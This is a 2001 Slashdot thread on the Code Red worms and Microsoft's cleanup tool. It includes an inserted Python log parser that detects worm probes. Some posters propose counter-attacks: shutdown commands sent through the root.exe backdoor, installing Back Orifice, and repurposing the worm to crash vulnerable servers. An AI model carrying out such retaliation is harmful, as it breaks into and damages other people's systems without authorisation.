    "Everybody running a version of Windows on their computer should go to http://windowsupdate.microsoft.com , and download all of the items in 'Critical Updates' (which has the security patches selected by default when you first load it anyway)."

    If you are vulnerable to Code Red and you're a home user, the patch appears in the list of updates and will be installed. If not, well, no harm done.

    That's the whole point of Windows Update; if we could just get people to go to it even if they don't think they are open to Code Red, we could put a stop to this thing really fast.

    That's the problem here, not IIS. A bunch of clueless home users who don't know what's going on and have no reason to check because of the way it's being reported will not be the downfall of IIS. If Linux had any amount of home users to speak of, we'd see the same sort of problem among them eventually.

    --
    -- "So they told me that using the download page to download something was not something they anticipated." - Bill Gates
    1. Re:No. by mpe · · Score: 2

      "Everybody running a version of Windows on their computer should go to http://windowsupdate.microsoft.com , and download all of the items in 'Critical Updates' (which has the security patches selected by default when you first load it anyway)."

      Assuming Microsoft actually bothers to put the right patches here. IIRC they didn't with the relevant IIS patch.

  41. Use the tool, then format anyways? by moniker_21 · · Score: 2, Interesting

    So first Microsoft says this in the description of the tool:
    Microsoft has developed a tool that eliminates the obvious damage that is caused by the Code Red II worm.
    Then they say this:
    MICROSOFT RECOMMENDS THAT INFECTED INTERNET-FACING SERVERS BE REBUILT ACCORDING TO THE GUIDELINES PUBLISHED ON THE CERT WEB SITE.

    It should be noted that among other things in the CERT guidelines, they tell you to do a clean install of your OS after you've been compromised. So what's the point of this tool if MS thinks you should just R&R your OS anyways?

    --
    I posted to /. and all I got was this stupid sig
    1. Re:Use the tool, then format anyways? by stripes · · Score: 2
      So while not completely bullet-proof, the possibility is certainly there that one machine visible to the Internet got infected and spread the infection to other machines on the network which are not visible to the Internet.

      So that second machine is totally safe, as long as there is no security problem on the first machine that lets anyone into it (root.exe anyone?)... in other words, better reformat 'em both.

      The "hidden" machines may have a lower chance of having been altered, but since they are probably more important (otherwise why hide them?) that should make one want to be even more careful with them.

  42. Conspiracy Theory by hacker · · Score: 2, Interesting

    Has anyone begun to think that perhaps Microsoft themselves has planted CodeRed and variants out on the internet? Before you mod me down, read on:

    CodeRed, the first version, was fairly lame, and didn't infect beyond a separate IP block. Microsoft gets scared and realizes that their "imminent" release of WinXP might be blocked, or worse yet, shunned by the consumers. "Oh no, now we can't track all those stolen copies of Windows".

    Then CodeRedII comes out, a bit nastier, going after more machines. Then Microsoft is denied their appeal.

    CodeRedIII comes out, infection is much worse, and now opens the machine up to more attacks than before. It gets so deep into your Windows system that you must reinstall anyway. Not only that, but allows anyone who reads their logs to go in and cause damage ("polluting blame" as we say). Now compromised machines are being hacked in many more ways than just being opened up.

    What does Microsoft recommend? You download this "patch" (audit tool) which you run and then it "cleans" (audits) your system, then as their own CERT document recommends, you reinstall your OS (i.e. find your original, licensed install media, and hit our website for the latest (intentionally trojaned) copies of drivers and IE/ActiveSetup installation tools).

    What's a bit odd about this process though, is that Microsoft requires that you run their "cleanup" tool to purge the infection, THEN reinstall. If I'm going to fdisk and reinstall anyway, why do I have to run this "cleanup" tool? (audit?)

    Curious that nobody has thought of this angle. Why do we not hear about hundreds of FBI agents tracking down the author of the virus in the Faroese Islands or whatever? Usually these people are caught within days of the outbreak. There hasn't been a single peep about any investigation in two full weeks. It's not like we don't have a HUGE audit trail; we all have dozens of logs. Plot it out, find the dates/times, narrow the search, and find them.

    Oh wait, perhaps they're the same entity which supplied you with the infectable OS in the first place.

    What was that they were saying about Linux being "potentially viral" a few weeks ago?

  43. Has anyone tried running this under Windows? by Mustang+Matt · · Score: 2

    I haven't examined the script yet but Perl will run under windows. Not sure how you'd give it control of .ida though.

    --
    The man who trades freedom for security does not deserve nor will he ever receive either. - Benjamin Franklin
    1. Re:Has anyone tried running this under Windows? by BigBlockMopar · · Score: 2

      A little off topic, how do you know if the infected computer is version 1 or 2?

      Follow the link in my .sig. NNNN = Code Red I. XXXX = Code Red II. Most of them now seem to be CR2 because it's a much more active hunter. When my log files rotate, you're gonna be out of luck until I get hit again. :)

      --
      Fire and Meat. Yummy.
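    As an added example (not code from the thread or from any poster), here is a short Python pass over Apache access-log lines that tells the two worm variants apart the way the reply above describes, by the padding character in the default.ida request (N for Code Red I, X for Code Red II), flags probes for the /scripts/root.exe backdoor mentioned elsewhere in the thread, and counts probes per source address. The log lines are constructed samples, and the encoded payload that follows the padding in a real request is omitted.

    ```python
    import re
    from collections import Counter
    from typing import Optional

    # Apache combined/common log format: ip ident user [time] "METHOD path PROTO" status ...
    LOG_RE = re.compile(
        r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
        r'"(?P<method>\S+) (?P<path>\S+)(?: \S+)?" (?P<status>\d{3})'
    )

    # Constructed sample log lines (not from a real server): a Code Red I probe
    # padded with N, a Code Red II probe padded with X, a probe for the root.exe
    # backdoor, and one ordinary request. The exploit bytes after the padding
    # are left out; the padding alone is what identifies the variant.
    SAMPLE_LOG = """\
    192.0.2.10 - - [04/Aug/2001:10:21:03 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNN HTTP/1.0" 404 276
    192.0.2.11 - - [05/Aug/2001:02:14:55 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 276
    192.0.2.11 - - [05/Aug/2001:02:15:10 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 276
    192.0.2.12 - - [05/Aug/2001:02:15:40 -0400] "GET /scripts/root.exe HTTP/1.0" 404 282
    198.51.100.7 - - [05/Aug/2001:02:16:00 -0400] "GET /index.html HTTP/1.1" 200 1043
    """


    def parse_line(line: str) -> Optional[dict]:
        """Split one access-log line into its fields, or None if it does not parse."""
        m = LOG_RE.match(line)
        return m.groupdict() if m else None


    def classify_request(path: str) -> Optional[str]:
        """Label a request path by what it tells the defender.

        'code-red-1'  default.ida probe padded with N
        'code-red-2'  default.ida probe padded with X (the variant that leaves root.exe)
        'ida-other'   any other default.ida request (worth a look, variant unknown)
        'root-exe'    someone checking whether this server carries the backdoor
        None          not worm-related
        """
        base, _, query = path.partition("?")
        if base.lower() == "/default.ida":
            if query.startswith("N"):
                return "code-red-1"
            if query.startswith("X"):
                return "code-red-2"
            return "ida-other"
        if path.lower().startswith("/scripts/root.exe"):
            return "root-exe"
        return None


    def summarize(log_text: str) -> dict:
        """Count worm-related requests per (source ip, label) and per label."""
        by_source: Counter = Counter()
        by_label: Counter = Counter()
        for line in log_text.splitlines():
            rec = parse_line(line)
            if rec is None:
                continue
            label = classify_request(rec["path"])
            if label is None:
                continue
            by_source[(rec["ip"], label)] += 1
            by_label[label] += 1
        return {"by_source": by_source, "by_label": by_label}


    def infected_sources(log_text: str) -> dict:
        """Map each source that sent a default.ida probe to the variant seen.

        A host sending these probes is itself infected (and therefore unpatched);
        Code Red II sources are the ones the thread says need rebuilding rather
        than a reboot.
        """
        seen = {}
        for (ip, label), _ in summarize(log_text)["by_source"].items():
            if label.startswith("code-red") or label == "ida-other":
                seen[ip] = label
        return seen


    if __name__ == "__main__":
        report = summarize(SAMPLE_LOG)
        for label, n in sorted(report["by_label"].items()):
            print(f"{label:12s} {n}")
        for ip, variant in sorted(infected_sources(SAMPLE_LOG).items()):
            print(f"infected source {ip}: {variant}")
    ```
    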
  44. Re:Stop blaming microsoft by KilobyteKnight · · Score: 2

    When you buy a house, you know for a FACT that glass will break when hit with a hammer.

    The people who buy MS products THINK they're getting something secure, since it's one of the many buzzwords (READ: lies) that MS always uses.

    Many people look to buy a house in a "safe" neighborhood. Most people want cars with a good "safety rating". People install alarm systems in their homes and cars to make them "safer".

    You know what... none of that works either. Determined people will always find a way to break things. It doesn't matter if it is a house, a car, an alarm system, or an operating system.

    You simply shouldn't try to blame one entity for the malicious acts of another.

    --
    When will Windows be ready for the desktop?
  45. Re:FUD ALERT by Longstaff · · Score: 2, Informative

    It seems to me that a GOOD ADMIN would have any important data backed up prior to installing/upgrading any mission critical servers. Just because you're a negligent moron doesn't mean that Windows sucks.

    You're correct that a "Good Admin" would back their data up before performing a system upgrade / patch.

    However, in this case, Windows DOES suck, regardless of the (moron|genius) at the keyboard.

    Any system that *requires* OS updates to be bundled and installed along with the application (IIS) updates is broken. It matters not if you have an intern "administering" the box or a 10-year-vet.

    If, for some reason, the latest bugfix from Apache broke compatibility with a current or previous Linux kernel, I can always pop a new kernel in there. On my own time. Checking to make sure that none of my other apps will break. Even if I'm not paying attention and blindly upgrade Apache without checking its deps, I'm left with an unusable Apache - my data is still there. I can just backpedal to my previous Apache and I'm up again.

    Not so with (2K|NT)/IIS. Install SP, hose machine...reinstall...

    One of these situations takes a little more time than the other...

  46. Re:Stop blaming microsoft by TedCheshireAcad · · Score: 2, Funny

    Seriously, we don't need standard library routines. What use is printf() anyhow??

  47. And it keeps going by bonzoesc · · Score: 4, Informative

    I got this mail, and the problem is that people are WAY TOO STUPID to know what to do. If the microsoft patch can tell if it needs to do anything or not, RR and @home security should point everybody to it.

    From: security@cfl.rr.com
    To: Our Valued Customers
    Subject: Security Notification

    ROAD RUNNER ALERT

    VIRUS ALERT. YOUR IMMEDIATE ACTION IS REQUIRED.

    Dear Road Runner Subscriber:

    Road Runner, like many other ISPs and, indeed, the entire Internet, has
    experienced an attack on its network that apparently is attributable to a
    strain of the Code Red virus. It is possible that this virus has infected
    the PCs of Road Runner customers using the Microsoft Windows NT Server or
    Microsoft Windows 2000 Server operating systems. Infected PCs may
    continue to flood the Internet and the Road Runner network with
    virus-generated messages (even without your being aware of it).

    Road Runner is working to alert all of its subscribers to this problem
    and to instruct them on where to find and install the patch necessary to
    eliminate the virus. In the meantime, Road Runner customers may
    experience slow network response, flashing data lights on their cable
    modems, and other symptoms (such as unusual port scan log activity or
    increased firewall activity) while Road Runner and the Internet community
    work to control the impact of this virus.

    IF YOUR PC IS RUNNING WINDOWS 2000 SERVER OR WINDOWS NT 4.0 SERVER,
    PLEASE IMMEDIATELY DOWNLOAD THE CODE RED PATCH FROM MICROSOFT'S WEBSITE
    (www.microsoft.com/security) AND RESTART YOUR PC.

    IF YOUR PC IS RUNNING WINDOWS 98, WINDOWS 95, OR WINDOWS ME, OR IF YOU
    ARE A MACINTOSH USER, NO ACTION IS REQUIRED ON YOUR PART.

    We ask for your patience while Road Runner continues to work with the
    Internet community to address this virus.

    Thank you.

    Road Runner Security

    1. Re:And it keeps going by Tridus · · Score: 2

      No, it's not installed by default.

      But it's so easy to install a trained monkey could do it. In 2k it's just "Add/Remove Programs" and hit a checkbox. It's more difficult in NT in my experience; I've had horrible experiences trying to install IIS4 with anything other than SP3 as the current service pack level. IIS4 is also part of the Option Pack, and not included in NT itself (that's IIS2, which afaik is not vulnerable to Code Red).

      They should be telling people who are running NT/2k of any variety to install the patch, that would go a lot farther towards solving the problem.

      --
      -- "So they told me that using the download page to download something was not something they anticipated." - Bill Gates
    2. Re:And it keeps going by bonzoesc · · Score: 2
      It must not be installed by default - I don't have it in my Services listing. Doesn't matter - if I need serving, I've already got Apache installed.

      And no, I don't exclusively use Linux. I *have* to play RollerCoaster Tycoon.

  48. That script by Mike+Hicks · · Score: 2

    Unfortunately, I don't think that script will work. I don't have an IIS box to test on, but my NT 4.0 workstation will not shut down with that `rundll32 shell32.dll,SHExitWindowsEx 5' command. I get a dialog box to pop up saying ``Error in shell32.dll Missing Entry: SHExitWindowsEx''

    I have a PHP script set up to do a `net send %COMPUTERNAME%'. If I can find an FTP server with Microsoft's new tool, I may start downloading that with an FTP script and running it.

    However, I also heard that IIS doesn't run with many privileges at all on Win2k boxes. It may not be possible to do anything at all.

    1. Re:That script by Mike+Hicks · · Score: 2

      Heh.. I never realized that one. Good catch ;-)

      I haven't personally tried the `iisreset' trick -- I've heard it doesn't work. Not sure, though.

  49. About time! by supabeast! · · Score: 3, Informative

    " it also gives you an option to permanently disable IIS..."

    About time Microsoft showed people how to secure a Windows web-server! Turn off the web daemon! *sigh*

  50. Re:Stop blaming microsoft by Trepidity · · Score: 2

    If you truly are an NT server admin then I pity you. While you spend half your day researching and applying patches to your servers, BSD and Linux admins get to play around with the really fun stuff.

    Hrm, I seem to recall the Morris worm exploiting a Sendmail vulnerability. Patching sendmail hardly seems like "play[ing] around with the really fun stuff." Not to mention the recent BIND hole...

  51. Re:If you've had a corporate hit on your network.. by GC · · Score: 2, Informative

    So it probably would be a good idea for anyone to send every host that comes in searching for default.ida at least one reboot command to make sure that patched machines don't bother us again.
    The root.exe left in their scripts directory would be their own problem.

    No, this is another common misconception. The explorer.exe trojan makes Code Red ][ infected machines survive the reboot.

    Also I've seen many people expressing that they could stop the IIS service. I have tried this and it doesn't work.

    I've even seen another /. user set up a script to do this automatically. - He/She is using a similar technique to one that I've already tried. For some reason it doesn't work.

    Files on an infected machine can be accessed via http://lusers.ip.net/scripts/root.exe, but there are restrictions as to what you can do.

    The infected machines are Win2k (ie WINNT based) - if they're running NTFS then there are specific permissions on the file directory structure. I believe that this restricts what you can do with root.exe.

  52. Comment removed by account_deleted · · Score: 3, Insightful

    Comment removed based on user account deletion

  53. Re:Liability for software defects by norton_I · · Score: 2

    There is a big difference between a "normal" EULA and the GPL:

    The GPL grants you the privilege of copying, redistributing, and making derivative works of copyrighted material, in exchange for agreeing to certain provisions. You only need to agree to the GPL if you want to do one of the above. When you buy GPL software, you are buying the software. If you so choose, the GPL provides you with a superset of the rights you automatically get by buying a copy.

    "normal" EULAs attempt to specify how you can and can't use the software in any case. They claim that you haven't purchased a copy, and you don't have the right to use the software as you wish.

    Whether the courts would choose to recognize this distinction depends on how much corporate America bribes them.

    In any case, this has no direct bearing on the liability issue.

  54. Re:Not the mess they made... by Sethb · · Score: 3, Informative

    Looking through my logs, I think it's more likely that it is home users that are infected now, a lot of DSL users on dynamic IP addresses are hitting me.

    I haven't seen it posted here on Slashdot yet, but there's a neat little Java Applet (it's even GPL) over at:

    http://www.dynwebdev.com/codered/

    It auto-replies to any machine that tries an .ida exploit against you, popping up a Net Send message on the computer, so hopefully someone will notice and patch the machine...

    --
    When in danger or in doubt, run in circles, scream and shout. --Robert A. Heinlein
  55. Letter from MS: by djocyko · · Score: 5, Funny

    From: Support@iis.microsoft.com
    To: Registered_Users@iis.microsoft.com
    CC:
    Subject: RE: IIS Code Red Worm Patch
    Attachment: Instructions.doc
    Body:

    Hi, how are you?

    We are writing you in response to the Code Red worm that has recently attacked our premium enterprise gold standard web portal system, Microsoft Internet Information Server. We have compiled a set of directions for patching the server, and have included these instructions in an easy to read Word document. If MS Outlook didn't automagically open this attachment for you, double click on the attachment link above.

    If you have any advice on this file, please email us back!

    See you later!

  56. Microsoft Assumes... by Greyfox · · Score: 2
    That someone clever hasn't already written a bit of code that goes through their web logs and installs back orifice on all the compromised systems that have tried to scan them (over 3500 since last Saturday, here.)

    Once your system has been compromised in this fashion, the only way to be sure is fdisk, format, and reinstall.

    --

    I'm trying to teach myself to set people on fire with my mind... Is it hot in here?

  57. rude link on main page. by jeffehobbs · · Score: 2, Informative

    Linking to a page that could potentially shut down/restart your machine without warning is rude, virus or not.

    ~jeff

  58. Re:Stop blaming microsoft by Crixus · · Score: 3, Flamebait
    I agree with you not to blame MICROS~1. Blaming them is like blaming a glass manufacturer for when a robber breaks a window, and steals your tv. Blame the damn virus writer! And blaming the sys admins is like blaming the owner of the house because he/she does not know that the glass they bought with the house is NOT bullet proof.

    No, no, no.

    When you buy a house, you know for a FACT that glass will break when hit with a hammer.

    The people who buy MS products THINK they're getting something secure, since it's one of the many buzzwords (READ: lies) that MS always uses.

    Your analogy just doesn't do justice to the situation.

    Rich...

    --
    Ignore Alien Orders
  59. Re:Not the mess they made... by mpe · · Score: 3, Insightful

    Code Red is not the problem, it is the symptom. If Microsoft had fixed the problem before there was a problem, then the buggy version of IIS never would have shipped.

    However, part of the problem is the use of huge monolithic programs, which attempt to do everything including the "kitchen sink". For quite a while with Windows we have been seeing what amount to exploits through "bells and whistles". Frequently where most people don't even know something is even there...

  60. Only gets SOME of 'em. by Ungrounded+Lightning · · Score: 2
    OK, who can write a perl CGI script that will, on connection from an infected host, send the appropriate commands to root.exe; download the tool; and run it?

    That only works if the server is infected by the version that installs the trojan.

    With a little more work one could take advantage of the fact that being infected by any version of the worm shows the server is vulnerable to the original buffer-overflow attack. So one could:

    Get a copy of the worm.

    Modify it to take the web server down (or whatever) rather than infecting it.

    Install a launcher for it as default.ida in the document root of your webserver.

    Note that by now any worm-infested machine - benign or backdoor version - may have several diverse rootkits installed. So it should be reinstalled (preferably with linux or a BSD and apache B-) ) rather than cleaned out and patched. And a machine infected with the benign worm, if merely crashed, will no doubt be brought back up and eventually infected with the backdoor-installing version.

    Some authors of retaliatory-strike software will no doubt choose to disable the web server on a more permanent basis - as by removing the unpatched DLL (along with the several backdoors the worm installs - see a patch tool here) - rather than merely shutting it down.

    While this may get them in trouble, choosing to reformat the drives would be a hostile action, since it might destroy unbacked parts of the web site. (It would also likely lead to the administrators installing a backup, complete with vulnerability. So it is a less effective retaliatory strike.)

    Finally: I do NOT recommend actually doing this, as it may be illegal. The more damaging alternatives certainly are illegal (and also unnecessary, given the availability of less damaging alternatives).

    --
    Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
  61. What I'd like to see... by abischof · · Score: 2

    I'd be interested in seeing how the sales of Code Red have correlated with the public's awareness of Code Red.

    --

    Alex Bischoff
    HTML/CSS coder for hire

  62. Dumbest thing they could do by Talla · · Score: 5, Insightful

    When a box has been cracked, you need to do a complete reinstall, as you can never know what backdoors have been installed. Sure, you can remove RCII, but while it was active, it would only take even the dumbest script kiddie a couple of requests to install another backdoor.

    1. Re:Dumbest thing they could do by Trepidity · · Score: 2

      I still think it's better than nothing - many people simply *won't* wipe and reinstall, especially if it's not a corporate server, but just a small personal website in which security isn't exactly the number one concern. At least this tool will do a more thorough job than the manual attempts to clean up that would've happened otherwise.

    2. Re:Dumbest thing they could do by snake_dad · · Score: 2

      And, depending on how much ethernet snooping the rooted box can do, change all passwords that may have been seen on that segment, and the passwords of the machine itself. The password database might have been taken as well. Maybe this will not affect a webserver, but the same passwords might be used on other machines and/or services. No backdoors necessary...

      --
      karma capped .sig seeking available Slashdot poster for long-term relationship.
    3. Re:Dumbest thing they could do by GrumpyOldManager · · Score: 3, Interesting

      You are absolutely right. This tool probably couldn't detect secondary changes made to the machine's binaries.

      We have a policy of formatting the hard drive and reinstalling the OS once a machine has been compromised. This policy applies to any OS we run. To make it easy we've automated the process. To test the process we reinstall all of the machines on a regular basis, even servers. We spent some time years ago convincing vendors like RedHat that this was a useful thing (think jumpstart).

  63. EXACTLY [Re:Why no lawsuits?] by rm3friskerFTN · · Score: 2, Interesting
    As I posted earlier [strange ... did someone "astroturf MOD" it to -1?]

    QUESTION: If Joe/Jane Consumer running whatever OS/Apps that exist suffered as a result of the Microsoft Code Red I & II Worm can he/she sue Microsoft for losses???

    IMPORTANT NOTE: Joe/Jane Consumer did NOT sign/accept/whatever an EULA associated with Microsoft Web Server. Joe/Jane was just "harmed" by the poorly designed, fault ridden, Microsoft Server Software. Joe/Jane NEVER signed/accepted/whatever the EULA associated with the poorly designed, fault ridden Microsoft Server Software.

    --

    I believe Juanita

  64. Re:FUD ALERT by sqlrob · · Score: 2, Interesting
    An attacker would have to already have access to the machine in order to exploit the broken sequencing.

    No, they'd need access to the subnet, not the machine. The security issue isn't with the machine that was patched, but the machines it communicates with

    There's also a 6a, which is why I wasn't sure whether it was 5 or 6.

    I don't know how much the issue is "new security holes" from the patch but "will it still work?". Look at 5->5a, 6->6a, DX8->DX8a, 3(!) attempts to fix that hole in Exchange, etc. Every MS patch needs to be regression tested on a non production box before being really attempted. It's too dangerous to do otherwise. It's also too dangerous not to immediately patch now as well. SNAFU.

  65. Stop blaming microsoft by MeowMeow+Jones · · Score: 4, Funny

    Blame the creators of C.

    They're the ones who are responsible for buffer overflows.

    --

    Trolls throughout history:
    Jonathan Swift

    1. Re:Stop blaming microsoft by SuiteSisterMary · · Score: 2

      *Sigh* No shit, eh? What say we go start a Slash-based site for NT called 'backslashdot.org?'

      --
      Vintage computer games and RPG books available. Email me if you're interested.
    2. Re:Stop blaming microsoft by ClosedSource · · Score: 2, Insightful

      You're absolutely right.

      The reason that some slashdot posters don't want to blame the virus writer is because they're quite happy with Code Red because it makes MS look bad. The enemy of their enemy is their friend .. At least until their ports get blocked by their ISP.

    3. Re:Stop blaming microsoft by tswinzig · · Score: 5, Insightful

      The people who buy MS products THINK they're getting something secure, since it's one of the many buzzwords (READ: lies) that MS always uses.

      The only people that think they are getting something secure when they buy/download any operating system are the unwashed masses. The ones that don't know any better. These are the same people that allow the Code Red-style worms to spread.

      The rest of us applied the patch supplied by Microsoft more than a month before CR came out...

      You see, as an admin in charge of machines running IIS and other Microsoft software, I am subscribed to several alert lists, including Microsoft's security list. And when Microsoft releases a patch for anything that can be used to "arbitrarily execute code of the attacker's choice" on a port not blocked by my firewall, I immediately install that patch. The end.

      I'm so sick of people blaming Microsoft. They released a patch well before Code Red. Get over it.

      --

      "And like that ... he's gone."
    4. Re:Stop blaming microsoft by Bryan+Andersen · · Score: 3, Insightful
      Actually IIS is written in Visual C++. Blame M$, they left the buffer overflows available to use in the C++ libraries.

      I rarely use C's or C++'s overflowable library routines. If I do it's only in a quick hack. One doesn't need to use the standard library routines.

    5. Re:Stop blaming microsoft by Felinoid · · Score: 3, Insightful

      When you buy a house, you know for a FACT that glass will break when hit with a hammer.

      Windows is sold as shatter proof glass..
      This means it will not break.

      Linux is sold as theft resistant..
      This means it can break but it's difficult to gain entry..

      Microsoft says:
      When Windows breaks "well all software breaks"
      When Linux breaks "See it breaks.. everyone breaks..."

      Linux says:
      When Windows breaks "Where is the patch?"
      When Linux breaks "Here is the patch"

      Security experts say:
      "Get the operating system patched ASAP..
      If you have the source code.. fix it yourself NOW don't wait for an official patch"

      Microsoft security experts say:
      "Wait for an official patch.. don't do it yourself"

      RL security experts say:
      "Fix it now.."

      RL thieves say:
      "BWAR.. Break Window And Run.... thwarts any security system....
      Wait a while. If they don't fix the window quickly they'll soon forget...
      Once they relax.. walk in the opening and walk out.." (taken from a 1980's text file on how to steal...)

      From TV:
      "We have to wait for Microsoft to release a patch and then we have to test the system to be sure it works correctly and all the apps continue to work correctly." - Microsoft certified System admin being interviewed by a reporter...

      --
      I don't actually exist.
    6. Re:Stop blaming microsoft by JAK · · Score: 3, Funny

      You're absolutely right. Note to self: If I'm ever writing an OS, be sure to use java...

    7. Re:Stop blaming microsoft by dgp · · Score: 2, Informative

      The C language is being efficient when the for loop that copies the input buffer into RAM is not checking for an end of buffer condition. If you want that done automatically, use a home-brew memcpy or use a different language with bounds-checking like Java.

    8. Re:Stop blaming microsoft by mpe · · Score: 2

      Hrm, I seem to recall the Morris worm exploiting a Sendmail vulnerability.

      It used something left enabled by default which almost nobody actually needed. Who actually uses the default.ida file in the first place? Also the Morris worm was way before NT even existed...

  66. yes-but by Lumpy · · Score: 2

    IIS is written in Visual Basic...

    --
    Do not look at laser with remaining good eye.
  67. Blame Microsoft! by extrasolar · · Score: 2

    Blame Microsoft!
    Even though the kiddies did it,
    Microsoft will take shit for it!
    Well, they're not a real company anyway.

    (apologies to the southpark people)

  68. Re:FUD ALERT by clare-ents · · Score: 2

    "Any good admin would have important data backed up prior to installing."

    How do you back up the IIS settings on NT 4?

    Answer - you can't.

    --
    Only two things are infinite, the universe and human stupidity, and I'm not sure about the former. (Einstein)
  69. IIS go bye-bye by alexburke · · Score: 2

    it also gives you an option to permanently disable IIS

    Red Hat must be pleased that Microsoft is now bundling the Red Hat installer with their newest patch...

  70. Re:Not the mess they made... by mikethegeek · · Score: 4, Insightful

    "It's the mess left by lazy admins who can't be bothered with security patches a month before a worm comes out to exploit them. Shame on the NT admins."

    Does this really surprise anyone? MCSE's are trained (and tested) to solve everything by "reboot, reload, reinstall", because Microsoft's way is to "take the easy way out" instead of actually FIXING the problem.

    And, so many MS service packs BREAK servers and software when installed, can you also not blame people for NOT rushing to install them? Even where I work, where we do OS compatibility testing on servers, we don't start using new MS service packs until they've been tested and found safe by our internal test group...

    I for one expect use of IIS to drop as a consequence of the Code Red virus... Were IIS open source, these holes and backdoors would have been seen LONG ago and fixed. Apache runs MUCH more of the web than does IIS, yet you don't see anywhere near the number of bugs, exploits and DOS worms as does IIS.

    --
    === The price of freedom is eternal vigilance
  71. Here's how open source would be better... by mikemulvaney · · Score: 3, Insightful
    Microsoft fixed the problem before there was a problem. I don't see how Open Source would be any better in this regard.

    It's true that Microsoft put out a patch before the virus took off, so that's a good thing. But Microsoft releases patches all the time, and that is a bad thing. I'm on the security mailing list from MS, and I get at least 3 or 4 alerts a week. I'm also on the slackware list, and I have received 3 or 4 alerts in the last six months.

    The reason for this is because Open Source projects tend to fix their security bugs before they are released. If Apache shipped with something that allowed this kind of remote exploit in one of the 2.0 betas, there is a better chance that someone else out there will see it. What is the chance that someone can do an independent security audit of Windows XP?

    Closed source can be perfectly good at closing holes, if the company is as big as Microsoft. But Open Source is much better at closing those holes before they are shipped: many eyeballs make all bugs shallow. Open Source doesn't catch every bug, of course; but enough are found that when the odd hole is announced, it is a big enough deal that the patches are more likely to be installed.

    Closed Source hurts Microsoft security in more ways than one. Not only are all default installations compromised, but since so many new patches come out every week most admins don't keep up with them. While this is partially the admin's fault, it is also the fault of the software model that prevents these problems from being found quickly.

    -Mike

    PS: how do we know that "Microsoft fixed the problem before there was a problem", anyway? The patch came out before this big worm hit, but how many servers were quietly compromised in the last year?

    1. Re:Here's how open source would be better... by sheldon · · Score: 2

      It sounds as though Slackware doesn't provide very good support. If you check RedHat, they issue about 5-6 security patches a month, on average for their Linux distribution.

      I count 20 out on their site for RedHat 7.1 since April of this year.

      I use that one as an example, but I suspect if you studied the realm of what ships with RedHat you would find many items would qualify as beta releases, or are projects that are in a constant state of beta.

      Apache takes the attitude of shipping a very minimal set of tools. The problems are seldom in Apache, they are in all the third party add-ins.

      Microsoft's IIS is a very featureful suite of utilities that includes much more than a web server. It's not surprising at all that it has more bugs than the spartan Apache.

  72. Re:Nice Grammar, RR! by bonzoesc · · Score: 2

    That's actually when I got this message - but I felt a need to post it today just to demonstrate what retarded "admins" have to ignore in order to distribute Code Red.

  73. Re:The $64K question: Does it actually work? by psychalgia · · Score: 2, Informative

    The patch worked, it cleared my server of any problems, but it did report failing to complete. Either way I can no longer "get root" via a webserver, and www.securityspace.com reports I'm clean. Now I just sit and wait for the next one! (Actually, compound this with the fact that my entire company depends on RHYTHMS, it has been an EXCITING week)

    --

    ________________________________________________

  74. Re:Warhol Worm proposed: 15 minutes to total infec by Rubik+Penguin · · Score: 2, Insightful

    This is spot on. Changeover to IPv6 (with its larger address space) would have stopped Code Red before it even started. A worm would take years on IPv6 to find another host to infect. IPv6 would put an end to random port scanning too.

  75. Re:Not the mess they made... by mpe · · Score: 2

    A computer is a tool. You have to learn how to use it properly. Do you go around demanding that 747's be made so easy to fly that every office worker could do it ?

    Also a pilot isn't going to be maintaining the aircraft. Certainly they can't use the controls in the cockpit to change the engines or such like...

  76. Re:Liability for software defects by ZxCv · · Score: 2, Insightful

    I highly doubt software makers will ever be held liable...

    Particularly in the x86 market, there is such an abundance of 3rd party hardware that goes into most systems. This usually means 3rd party drivers. And because these all have to work together, who's to say that it wasn't a bug in Windows that caused that video driver to fail? Or was it a bug in the driver itself? Who is to be held liable here?

    I don't think it is such a stretch to say that some software makers could (and maybe should) be held liable for their software. Such as in the case of the over-radiation that caused deaths. Last I checked, I didn't see the IIS bug causing anyone to croak and that last BSOD didn't give me any serious medical problems either. If traditional PC software makers were held liable for their software, the PC software market would simply collapse. And beyond that, the few companies left that could afford the added costs of this liability would be left to charge outrageously high prices for the software that they were able to sell.

    So, at first, this maybe sounds like not such a bad idea. But after thinking about it, I'd definitely be against it (for the most part).

    --

    Perl - $Just @when->$you ${thought} s/yn/tax/ &couldn\'t %get $worse;
  77. Re:Blame everyone bigger than you.! by mpe · · Score: 2

    Excuse me, but out of curiosity, what does the concept of 'iis exploits' have to do with code red? Code red does not exploit IIS. Code red exploits index server.

    You get this automatically with IIS; indeed, you have to explicitly turn it off.

    You could configure apache to use index server

    But it doesn't do it by itself!

  78. Re:Blame everyone bigger than you.! by mpe · · Score: 2

    It also goes without saying that any product marketed primarily to morons must be foolproof and robust to the most extreme extent possible. Does IIS qualify here?

    Does any part of Windows qualify?

    All the difficult bits should have warning messages at install time, similar to the warnings on cigarette packages, or the warnings on drug packages against dangerous interactions, knowing full well that products may be used by a moron.

    Or even like the "cartoon" style warnings you find on domestic appliances. Together with "refer all servicing to qualified personnel". Problem is the latter is likely to be easier with something more like unix (or even VMS) than any version of Windows :)

  79. Re:Not really the same thing by blang · · Score: 2

    From Eric Raymond's jargon file: !X id1
    id1: Friar Tuck... I am under attack! Pray save me!
    id1: Off (aborted)
    id2: Fear not, friend Robin! I shall rout the Sheriff of Nottingham's men!
    id1: Thank you, my good fellow!

    --
    -- Another senseless waste of fine bytes.
  80. Re:If you've had a corporate hit on your network.. by GC · · Score: 2

    Yes,

    Those machines have probably been patched since infection, but have not been cleaned. The patch does not dis-infect Code Red from the machine, a lot of web admins don't realise this.

    I have found vulnerable machines with this tool. I'm also wondering if unpatched infected machines show up with it - as Code Red prevents re-infections by its own code.

  81. Re:Not the mess they made... by Fishstick · · Score: 2

    You are quite right, and I didn't mean to imply otherwise. This is in fact a problem with the group that supplies the PCs to the various departments. They have a process where they "ghost" pre-configured drive images. For some reason, they use a standard development image, which includes a running IIS5 config, on _all_ machines, even those used by the secretarial staff. Go figure.

    But you are right, this isn't as much MS's fault as the bonehead admin that set up the default machine configs.

    --

    There is much cruelty in the universe, John.
    Yeah, we seem to have the tour map.

  82. Shuts down only DANGEROUS machines by leonbrooks · · Score: 2

